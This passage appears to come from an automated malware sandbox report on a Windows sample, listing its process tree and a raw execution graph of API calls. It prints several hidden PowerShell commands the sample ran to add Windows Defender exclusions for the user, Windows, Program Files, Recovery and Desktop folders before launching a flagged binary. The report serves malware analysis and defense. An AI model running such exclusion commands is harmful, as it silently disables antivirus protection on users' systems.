                                                Commandline:"C:\Users\user\Desktop\UBONg7lmVR.exe"
                                                Imagebase:0x6f0000
                                                File size:52'506'624 bytes
                                                MD5 hash:D2DB9A159617250A517F9D074AB8F947
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:low
                                                Has exited:false

                                                Target ID:2
                                                Start time:07:05:52
                                                Start date:27/08/2024
                                                Path:C:\Users\user\AppData\Local\Temp\y5cm2yzz.hwt.exe
                                                Wow64 process (32bit):false
                                                Commandline:"C:\Users\user\AppData\Local\Temp\y5cm2yzz.hwt.exe"
                                                Imagebase:0xb00000
                                                File size:8'077'824 bytes
                                                MD5 hash:A499C507987982C951093E21DF0C0D96
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:Go lang
                                                Antivirus matches:
                                                • Detection: 11%, ReversingLabs
                                                • Detection: 8%, Virustotal
                                                Reputation:low
                                                Has exited:true

                                                Target ID:4
                                                Start time:07:05:58
                                                Start date:27/08/2024
                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                Wow64 process (32bit):false
                                                Commandline:powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Users'"
                                                Imagebase:0x7ff788560000
                                                File size:452'608 bytes
                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:5
                                                Start time:07:05:58
                                                Start date:27/08/2024
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff7699e0000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:9
                                                Start time:07:06:09
                                                Start date:27/08/2024
                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                Wow64 process (32bit):false
                                                Commandline:powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Windows'"
                                                Imagebase:0x7ff788560000
                                                File size:452'608 bytes
                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:10
                                                Start time:07:06:09
                                                Start date:27/08/2024
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff7699e0000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:11
                                                Start time:07:06:19
                                                Start date:27/08/2024
                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                Wow64 process (32bit):false
                                                Commandline:powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Program Files'"
                                                Imagebase:0x7ff788560000
                                                File size:452'608 bytes
                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:12
                                                Start time:07:06:19
                                                Start date:27/08/2024
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff7699e0000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:14
                                                Start time:07:06:30
                                                Start date:27/08/2024
                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                Wow64 process (32bit):false
                                                Commandline:powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Program Files (x86)'"
                                                Imagebase:0x7ff788560000
                                                File size:452'608 bytes
                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:15
                                                Start time:07:06:30
                                                Start date:27/08/2024
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff7699e0000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:16
                                                Start time:07:06:41
                                                Start date:27/08/2024
                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                Wow64 process (32bit):false
                                                Commandline:powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Recovery'"
                                                Imagebase:0x7ff788560000
                                                File size:452'608 bytes
                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:17
                                                Start time:07:06:41
                                                Start date:27/08/2024
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff7699e0000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                Target ID:18
                                                Start time:07:06:52
                                                Start date:27/08/2024
                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                Wow64 process (32bit):false
                                                Commandline:powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Reka'"
                                                Imagebase:0x7ff788560000
                                                File size:452'608 bytes
                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                Target ID:19
                                                Start time:07:06:52
                                                Start date:27/08/2024
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff7699e0000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                Target ID:21
                                                Start time:07:07:02
                                                Start date:27/08/2024
                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                Wow64 process (32bit):false
                                                Commandline:powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath '%USERPROFILE%\Desktop'"
                                                Imagebase:0x7ff788560000
                                                File size:452'608 bytes
                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                Target ID:22
                                                Start time:07:07:02
                                                Start date:27/08/2024
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff7699e0000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                Target ID:23
                                                Start time:07:07:20
                                                Start date:27/08/2024
                                                Path:C:\Reka\rapnewsa.exe
                                                Wow64 process (32bit):true
                                                Commandline:C:\Reka\rapnewsa.exe
                                                Imagebase:0x2c0000
                                                File size:38'912 bytes
                                                MD5 hash:2D4E723C184D9403B078E53F2DE74A23
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Antivirus matches:
                                                • Detection: 100%, Avira
                                                • Detection: 100%, Joe Sandbox ML
                                                • Detection: 16%, ReversingLabs
                                                • Detection: 24%, Virustotal
                                                Has exited:true

                                                Target ID:26
                                                Start time:07:07:27
                                                Start date:27/08/2024
                                                Path:C:\Windows\SysWOW64\WerFault.exe
                                                Wow64 process (32bit):true
                                                Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 8032 -s 122888
                                                Imagebase:0xbc0000
                                                File size:483'680 bytes
                                                MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                  Execution Graph

                                                  Execution Coverage:14.2%
                                                  Dynamic/Decrypted Code Coverage:99.7%
                                                  Signature Coverage:3.7%
                                                  Total number of Nodes:1128
                                                  Total number of Limit Nodes:60
985842d 70168 985cab7 70096->70168 70173 985cac8 70096->70173 70097 985844a 70178 9857de8 70097->70178 70099 98584c3 70100 9857df8 6 API calls 70099->70100 70101 98584fd 70100->70101 70185 9895de3 70101->70185 70102 9858571 70103 9857df8 6 API calls 70102->70103 70104 985868f 70103->70104 70105 9857df8 6 API calls 70104->70105 70106 9858776 70105->70106 70189 989aaa8 70106->70189 70193 989aaa0 70106->70193 70107 98587b9 70197 989e9e3 70107->70197 70203 989e9e8 70107->70203 70108 98587f6 70109 9857df8 6 API calls 70108->70109 70110 985887a 70109->70110 70111 9857df8 6 API calls 70110->70111 70112 98589a2 70111->70112 70113 9857df8 6 API calls 70112->70113 70114 9858b08 70113->70114 70115 9857df8 6 API calls 70114->70115 70116 9858bbc 70115->70116 70117 9857df8 6 API calls 70116->70117 70118 9858cb0 70117->70118 70119 9857df8 6 API calls 70118->70119 70120 9858dda 70119->70120 70121 9857df8 6 API calls 70120->70121 70122 9858f17 70121->70122 70123 9857df8 6 API calls 70122->70123 70124 985902f 70123->70124 70134 9857d43 70133->70134 70209 5b496c8 70134->70209 70214 5b46fdc 70134->70214 70135 98592bf 70135->70085 70139 9857d73 70138->70139 70140 9859b53 70139->70140 70141 5b46fdc 7 API calls 70139->70141 70142 5b496c8 7 API calls 70139->70142 70140->70087 70141->70140 70142->70140 70144 9857da3 70143->70144 70146 9858370 70144->70146 70250 98580b4 70144->70250 70146->70092 70148 985aff0 70147->70148 70150 985b04e 70147->70150 70148->70094 70149 985b0b8 70149->70094 70150->70149 70151 985b089 70150->70151 70153 985b0bd 70150->70153 70151->70149 70155 985b041 6 API calls 70151->70155 70157 9857da8 6 API calls 70151->70157 70255 985b110 70151->70255 70152 9857de8 6 API calls 70154 985b1db 70152->70154 70153->70152 70155->70149 70157->70149 70160 9857db3 70158->70160 70159 985b0b8 70159->70096 70160->70159 70161 985b089 70160->70161 70163 985b0bd 70160->70163 70161->70159 70165 985b041 6 API calls 70161->70165 70166 985b110 6 API calls 70161->70166 70167 9857da8 6 API 
calls 70161->70167 70162 9857de8 6 API calls 70164 985b1db 70162->70164 70163->70162 70165->70159 70166->70159 70167->70159 70169 985cac8 70168->70169 70170 985cb42 70169->70170 70259 985ce58 70169->70259 70268 985ce68 70169->70268 70170->70097 70174 985cae1 70173->70174 70175 985cb42 70174->70175 70176 985ce58 7 API calls 70174->70176 70177 985ce68 7 API calls 70174->70177 70175->70097 70176->70175 70177->70175 70180 9857df3 70178->70180 70179 985b5bc 70179->70099 70180->70179 70181 9857df8 6 API calls 70180->70181 70182 985b79a 70181->70182 70183 9857df8 6 API calls 70182->70183 70184 985b7a5 70183->70184 70184->70099 70187 985ce58 7 API calls 70185->70187 70188 985ce68 7 API calls 70185->70188 70186 9895dea 70186->70102 70187->70186 70188->70186 70191 989aabb 70189->70191 70190 989aade 70190->70107 70191->70190 70192 9894800 DrawTextExW 70191->70192 70192->70190 70194 989aabb 70193->70194 70195 989aade 70194->70195 70196 9894800 DrawTextExW 70194->70196 70195->70107 70196->70195 70199 989ea1f 70197->70199 70198 989eb78 70198->70108 70199->70198 70309 989ed7b 70199->70309 70314 989ecd5 70199->70314 70318 989ecd8 70199->70318 70205 989ea1f 70203->70205 70204 989eb78 70204->70108 70205->70204 70206 989ecd8 DrawTextExW 70205->70206 70207 989ed7b DrawTextExW 70205->70207 70208 989ecd5 DrawTextExW 70205->70208 70206->70204 70207->70204 70208->70204 70211 5b49703 70209->70211 70210 5b499c9 70210->70135 70211->70210 70219 5b4dd21 70211->70219 70224 5b4dd30 70211->70224 70216 5b46fe7 70214->70216 70215 5b499c9 70215->70135 70216->70215 70217 5b4dd30 7 API calls 70216->70217 70218 5b4dd21 7 API calls 70216->70218 70217->70215 70218->70215 70220 5b4dd30 70219->70220 70221 5b4dd75 70220->70221 70229 5b4e000 70220->70229 70233 5b4dff0 70220->70233 70221->70210 70225 5b4dd38 70224->70225 70226 5b4dd75 70225->70226 70227 5b4dff0 7 API calls 70225->70227 70228 5b4e000 7 API calls 70225->70228 70226->70210 70227->70226 70228->70226 70230 5b4e008 70229->70230 70231 5b4e047 
70230->70231 70237 5b4c300 70230->70237 70231->70221 70234 5b4e000 70233->70234 70235 5b4e047 70234->70235 70236 5b4c300 7 API calls 70234->70236 70235->70221 70236->70235 70238 5b4c30b 70237->70238 70240 5b4ed60 70238->70240 70241 5b4e74c 70238->70241 70242 5b4e757 70241->70242 70243 5b46fdc 7 API calls 70242->70243 70244 5b4edcf 70243->70244 70247 5b4ee48 7 API calls 70244->70247 70245 5b4edde 70248 9850b80 6 API calls 70245->70248 70249 9850b88 6 API calls 70245->70249 70246 5b4ee09 70246->70240 70247->70245 70248->70246 70249->70246 70251 98580bf 70250->70251 70253 5b46fdc 7 API calls 70251->70253 70254 5b496c8 7 API calls 70251->70254 70252 985a974 70252->70146 70253->70252 70254->70252 70256 985b138 70255->70256 70257 9857de8 6 API calls 70256->70257 70258 985b1db 70257->70258 70260 985ce68 70259->70260 70264 985ce8c 70260->70264 70277 985ada4 70260->70277 70262 985ceb0 70263 985ada4 6 API calls 70262->70263 70265 985ceba 70263->70265 70264->70170 70265->70264 70281 985d370 70265->70281 70291 985d360 70265->70291 70269 985ce70 70268->70269 70270 985ada4 6 API calls 70269->70270 70274 985ce8c 70269->70274 70271 985ceb0 70270->70271 70272 985ada4 6 API calls 70271->70272 70273 985ceba 70272->70273 70273->70274 70275 985d360 DrawTextExW 70273->70275 70276 985d370 DrawTextExW 70273->70276 70274->70170 70275->70274 70276->70274 70278 985adaf 70277->70278 70279 98551b0 6 API calls 70278->70279 70280 985d1c1 70278->70280 70279->70280 70280->70262 70282 985d378 70281->70282 70283 985d38d 70282->70283 70285 985d39b 70282->70285 70289 985d360 DrawTextExW 70283->70289 70290 985d370 DrawTextExW 70283->70290 70284 985d397 70284->70264 70286 985d4b3 70285->70286 70301 9895fd0 70285->70301 70305 9895fe0 70285->70305 70286->70264 70289->70284 70290->70284 70293 985d370 70291->70293 70292 985d38d 70299 985d360 DrawTextExW 70292->70299 70300 985d370 DrawTextExW 70292->70300 70293->70292 70295 985d39b 70293->70295 70294 985d397 70294->70264 70296 985d4b3 70295->70296 70297 
9895fd0 DrawTextExW 70295->70297 70298 9895fe0 DrawTextExW 70295->70298 70296->70264 70297->70296 70298->70296 70299->70294 70300->70294 70302 9895fe0 70301->70302 70303 9896003 70302->70303 70304 9894800 DrawTextExW 70302->70304 70303->70286 70304->70303 70306 9895fe8 70305->70306 70307 9894800 DrawTextExW 70306->70307 70308 9896003 70306->70308 70307->70308 70308->70286 70310 989ed7f 70309->70310 70311 989ed06 70309->70311 70310->70198 70312 9894800 DrawTextExW 70311->70312 70313 989ed24 70312->70313 70313->70198 70315 989ecd8 70314->70315 70316 9894800 DrawTextExW 70315->70316 70317 989ed24 70316->70317 70317->70198 70319 989ece0 70318->70319 70320 9894800 DrawTextExW 70319->70320 70321 989ed24 70320->70321 70321->70198 69392 ad192c0 DispatchMessageW 69393 ad1932c 69392->69393 69394 ad18d40 KiUserCallbackDispatcher 69395 ad18da7 69394->69395 70322 5bdcc68 70323 5bdccaa 70322->70323 70324 5bdccb0 SetWindowTextW 70322->70324 70323->70324 70325 5bdcce1 70324->70325 70326 9896450 70330 9895330 70326->70330 70334 9895320 70326->70334 70327 9896475 70331 9895346 70330->70331 70333 985ab38 6 API calls 70330->70333 70338 985b830 70330->70338 70331->70327 70333->70331 70336 985b830 6 API calls 70334->70336 70337 985ab38 6 API calls 70334->70337 70335 9895346 70335->70327 70336->70335 70337->70335 70339 985b859 70338->70339 70341 985b8e0 70339->70341 70342 985b8f4 6 API calls 70339->70342 70343 9896488 6 API calls 70339->70343 70344 9896478 6 API calls 70339->70344 70345 985b900 6 API calls 70339->70345 70340 985b8aa 70340->70331 70341->70331 70342->70340 70343->70340 70344->70340 70345->70340 69396 ad11a4b 69397 ad11a5e 69396->69397 69401 5bdfb28 PostMessageW 69397->69401 69403 5bdfb20 PostMessageW 69397->69403 69398 ad11a81 69402 5bdfb94 69401->69402 69402->69398 69404 5bdfb94 69403->69404 69404->69398 70346 b3a96e0 70347 b3a9730 70346->70347 70351 b3a9b78 70347->70351 70356 b3a9b68 70347->70356 70348 b3a9969 70352 b3a9c22 70351->70352 70353 b3a9b9a 70351->70353 
70352->70348 70353->70352 70361 b3a9d81 70353->70361 70368 b3a9d90 70353->70368 70357 b3a9b78 70356->70357 70358 b3a9c22 70357->70358 70359 b3a9d90 5 API calls 70357->70359 70360 b3a9d81 5 API calls 70357->70360 70358->70348 70359->70358 70360->70358 70362 b3a9d92 70361->70362 70363 b3a9db1 70362->70363 70364 b3a84ac 5 API calls 70362->70364 70375 b3a9de1 70363->70375 70379 b3a84ac 70363->70379 70364->70363 70365 b3a9ddb 70365->70352 70369 b3a9da0 70368->70369 70370 b3a9db1 70369->70370 70371 b3a84ac 5 API calls 70369->70371 70373 b3a84ac 5 API calls 70370->70373 70374 b3a9de1 5 API calls 70370->70374 70371->70370 70372 b3a9ddb 70372->70352 70373->70372 70374->70372 70376 b3a9df0 70375->70376 70377 b3a9e1f 70376->70377 70383 b3aa2f8 70376->70383 70377->70365 70380 b3a84b7 70379->70380 70381 b3a9e1f 70380->70381 70382 b3aa2f8 5 API calls 70380->70382 70381->70365 70382->70381 70386 b3aa321 70383->70386 70387 b3aa393 70386->70387 70389 b3aa319 70387->70389 70394 b3aaa41 70387->70394 70399 b3aaa68 70387->70399 70388 b3aa543 70403 b3ab890 70388->70403 70408 b3ab883 70388->70408 70389->70377 70395 b3aaa4a 70394->70395 70396 b3aaa08 70394->70396 70413 b3aaafe 70395->70413 70396->70388 70400 b3aaa70 70399->70400 70402 b3aaafe 5 API calls 70400->70402 70401 b3aaa7b 70401->70388 70402->70401 70404 b3ab898 70403->70404 70450 b3ab8b8 70404->70450 70453 b3ab8ab 70404->70453 70409 b3ab898 70408->70409 70411 b3ab8ab 3 API calls 70409->70411 70412 b3ab8b8 3 API calls 70409->70412 70410 b3ab8a3 70410->70389 70411->70410 70412->70410 70416 b3a9fd0 70413->70416 70417 b3a9fdb 70416->70417 70422 b3aafcb 70417->70422 70430 b3aafd8 70417->70430 70438 b3ab090 70417->70438 70418 b3aaa7b 70418->70388 70426 b3aafed 70422->70426 70423 b3ab24a 70423->70418 70424 b3ab064 70424->70418 70425 b3ab1db 70425->70423 70427 b3ab23b KiUserCallbackDispatcher 70425->70427 70426->70424 70426->70425 70446 b3ab2c0 KiUserCallbackDispatcher 70426->70446 70448 b3ab2bb KiUserCallbackDispatcher 70426->70448 
70427->70423 70434 b3aafed 70430->70434 70431 b3ab24a 70431->70418 70432 b3ab064 70432->70418 70433 b3ab1db 70433->70431 70435 b3ab23b KiUserCallbackDispatcher 70433->70435 70434->70432 70434->70433 70436 b3ab2bb KiUserCallbackDispatcher 70434->70436 70437 b3ab2c0 KiUserCallbackDispatcher 70434->70437 70435->70431 70436->70434 70437->70434 70442 b3ab0de 70438->70442 70439 b3ab24a 70439->70418 70440 b3ab25b 70440->70418 70441 b3ab1db 70441->70439 70443 b3ab23b KiUserCallbackDispatcher 70441->70443 70442->70440 70442->70441 70444 b3ab2bb KiUserCallbackDispatcher 70442->70444 70445 b3ab2c0 KiUserCallbackDispatcher 70442->70445 70443->70439 70444->70442 70445->70442 70447 b3ab336 70446->70447 70447->70426 70449 b3ab336 70448->70449 70449->70426 70457 b3aa084 70450->70457 70454 b3ab8b8 70453->70454 70455 b3aa084 3 API calls 70454->70455 70456 b3ab8db 70455->70456 70458 b3aa08f 70457->70458 70459 b3ab090 3 API calls 70458->70459 70460 b3ab8db 70458->70460 70459->70460 70461 5b4bc68 70464 5b4bd4f 70461->70464 70462 5b4bc77 70465 5b4bd71 70464->70465 70467 5b4bd94 70464->70467 70465->70467 70472 5b4c3d8 70465->70472 70476 5b4c3f8 70465->70476 70466 5b4bd8c 70466->70467 70468 5b4bf98 GetModuleHandleW 70466->70468 70467->70462 70469 5b4bfc5 70468->70469 70469->70462 70473 5b4c3dd 70472->70473 70475 5b4c431 70473->70475 70480 5b4bfe8 70473->70480 70475->70466 70477 5b4c40c 70476->70477 70478 5b4bfe8 LoadLibraryExW 70477->70478 70479 5b4c431 70477->70479 70478->70479 70479->70466 70481 5b4c5d8 LoadLibraryExW 70480->70481 70483 5b4c651 70481->70483 70483->70475 69405 b3a7898 69406 b3a78ac 69405->69406 69407 b3a78bd 69406->69407 69411 5bdc9cc 69406->69411 69416 5bdc9d0 69406->69416 69408 b3a78e0 69412 5bdca16 69411->69412 69413 5bdca39 69412->69413 69421 9854ea8 69412->69421 69428 98505c4 69412->69428 69413->69408 69417 5bdca16 69416->69417 69418 5bdca39 69417->69418 69419 98505c4 3 API calls 69417->69419 69420 9854ea8 3 API calls 69417->69420 69418->69408 69419->69418 
69420->69418 69422 9854ead 69421->69422 69423 9854f12 69422->69423 69424 9854fbc 69422->69424 69426 9854f6a CallWindowProcW 69423->69426 69427 9854f19 69423->69427 69435 985049c 69424->69435 69426->69427 69427->69413 69429 98505cf 69428->69429 69430 9854f12 69429->69430 69431 9854fbc 69429->69431 69433 9854f6a CallWindowProcW 69430->69433 69434 9854f19 69430->69434 69432 985049c 2 API calls 69431->69432 69432->69434 69433->69434 69434->69413 69436 98504a7 69435->69436 69437 9853889 69436->69437 69439 9853879 69436->69439 69438 98505c4 3 API calls 69437->69438 69440 9853887 69438->69440 69444 98539a0 69439->69444 69449 9853a7c 69439->69449 69455 98539b0 69439->69455 69446 98539b0 69444->69446 69445 9853a50 69445->69440 69460 9853a59 69446->69460 69474 9853a68 69446->69474 69450 9853a3a 69449->69450 69451 9853a8a 69449->69451 69453 9853a59 3 API calls 69450->69453 69454 9853a68 3 API calls 69450->69454 69452 9853a50 69452->69440 69453->69452 69454->69452 69456 98539c4 69455->69456 69458 9853a59 3 API calls 69456->69458 69459 9853a68 3 API calls 69456->69459 69457 9853a50 69457->69440 69458->69457 69459->69457 69461 9853a68 69460->69461 69468 9853a79 69461->69468 69487 9854298 69461->69487 69492 989fd7c 69461->69492 69497 5bdbf60 69461->69497 69520 989fcbc 69461->69520 69526 989fd80 69461->69526 69532 9854288 69461->69532 69537 5bdc95c 69461->69537 69543 989fcc0 69461->69543 69549 5bdbf5c 69461->69549 69572 5bdee5c 69461->69572 69576 5bdee60 69461->69576 69468->69445 69475 9853a79 69474->69475 69476 5bdbf5c 3 API calls 69474->69476 69477 5bdee5c SendMessageW 69474->69477 69478 5bdc95c 3 API calls 69474->69478 69479 989fcc0 3 API calls 69474->69479 69480 989fd80 3 API calls 69474->69480 69481 9854288 3 API calls 69474->69481 69482 989fcbc 3 API calls 69474->69482 69483 989fd7c 3 API calls 69474->69483 69484 5bdbf60 3 API calls 69474->69484 69485 5bdee60 SendMessageW 69474->69485 69486 9854298 3 API calls 69474->69486 69475->69445 69476->69475 69477->69475 69478->69475 
69479->69475 69480->69475 69481->69475 69482->69475 69483->69475 69484->69475 69485->69475 69486->69475 69489 98542e4 69487->69489 69488 9854335 69488->69468 69489->69488 69490 5bdc9cc 3 API calls 69489->69490 69491 5bdc9d0 3 API calls 69489->69491 69490->69488 69491->69488 69493 989fd80 69492->69493 69494 989fd95 69493->69494 69580 989fde8 69493->69580 69585 989fde0 69493->69585 69494->69468 69498 5bdbf79 69497->69498 69502 5bdbf8c 69497->69502 69499 5bdbf7e 69498->69499 69500 5bdbfc0 69498->69500 69501 5bdbf83 69499->69501 69505 5bdbf9a 69499->69505 69500->69502 69504 5bdc24c 69500->69504 69506 5bdbfd1 69500->69506 69501->69502 69503 5bdc1aa 69501->69503 69512 5bdc10e 69502->69512 69516 5bdc52b 3 API calls 69502->69516 69517 5bdc530 3 API calls 69502->69517 69600 5bdb338 69503->69600 69608 5bdb3e8 69504->69608 69505->69502 69509 5bdc1b8 69505->69509 69510 5bdc214 69505->69510 69505->69512 69513 5bdc0c6 69505->69513 69506->69502 69506->69512 69506->69513 69518 5bdc52b 3 API calls 69509->69518 69519 5bdc530 3 API calls 69509->69519 69604 5bdb3a8 69510->69604 69512->69468 69590 5bdc530 69513->69590 69595 5bdc52b 69513->69595 69516->69512 69517->69512 69518->69512 69519->69512 69521 989fcc0 69520->69521 69523 989fce2 69521->69523 69524 9854288 3 API calls 69521->69524 69525 9854298 3 API calls 69521->69525 69522 989fd48 69522->69468 69523->69468 69524->69522 69525->69522 69527 989fd8e 69526->69527 69528 989fdc0 69526->69528 69529 989fd95 69527->69529 69530 989fde8 3 API calls 69527->69530 69531 989fde0 3 API calls 69527->69531 69528->69468 69529->69468 69530->69529 69531->69529 69534 98542e4 69532->69534 69533 9854335 69533->69468 69534->69533 69535 5bdc9cc 3 API calls 69534->69535 69536 5bdc9d0 3 API calls 69534->69536 69535->69533 69536->69533 69538 5bdc96e 69537->69538 69540 5bdc990 69537->69540 69539 5bdc97c 69538->69539 69541 9854288 3 API calls 69538->69541 69542 9854298 3 API calls 69538->69542 69539->69468 69540->69468 69541->69539 69542->69539 69544 989fcc8 
69543->69544 69546 989fce2 69544->69546 69547 9854288 3 API calls 69544->69547 69548 9854298 3 API calls 69544->69548 69545 989fd48 69545->69468 69546->69468 69547->69545 69548->69545 69550 5bdbf79 69549->69550 69555 5bdbf8c 69549->69555 69551 5bdbf7e 69550->69551 69552 5bdbfc0 69550->69552 69553 5bdbf9a 69551->69553 69554 5bdbf83 69551->69554 69552->69555 69557 5bdc24c 69552->69557 69558 5bdbfd1 69552->69558 69553->69555 69561 5bdc1b8 69553->69561 69562 5bdc214 69553->69562 69564 5bdc10e 69553->69564 69565 5bdc0c6 69553->69565 69554->69555 69556 5bdc1aa 69554->69556 69555->69564 69566 5bdc52b 3 API calls 69555->69566 69567 5bdc530 3 API calls 69555->69567 69559 5bdb338 3 API calls 69556->69559 69560 5bdb3e8 3 API calls 69557->69560 69558->69555 69558->69564 69558->69565 69559->69564 69560->69564 69568 5bdc52b 3 API calls 69561->69568 69569 5bdc530 3 API calls 69561->69569 69563 5bdb3a8 3 API calls 69562->69563 69563->69564 69564->69468 69570 5bdc52b 3 API calls 69565->69570 69571 5bdc530 3 API calls 69565->69571 69566->69564 69567->69564 69568->69564 69569->69564 69570->69564 69571->69564 69574 5bdee7f 69572->69574 69573 5bdee84 69573->69468 69574->69573 69612 5bdb194 69574->69612 69578 5bdee7f 69576->69578 69577 5bdee84 69577->69468 69578->69577 69579 5bdb194 SendMessageW 69578->69579 69579->69577 69581 989fe0e 69580->69581 69582 989fe43 69580->69582 69581->69494 69582->69581 69583 9854288 3 API calls 69582->69583 69584 9854298 3 API calls 69582->69584 69583->69581 69584->69581 69587 989fde7 69585->69587 69586 989fe0e 69586->69494 69587->69586 69588 9854288 3 API calls 69587->69588 69589 9854298 3 API calls 69587->69589 69588->69586 69589->69586 69591 5bdc53b 69590->69591 69592 5bdc542 69590->69592 69591->69512 69594 5bdc95c 3 API calls 69592->69594 69593 5bdc548 69593->69512 69594->69593 69596 5bdc53b 69595->69596 69597 5bdc542 69595->69597 69596->69512 69599 5bdc95c 3 API calls 69597->69599 69598 5bdc548 69598->69512 69599->69598 69601 5bdb343 69600->69601 
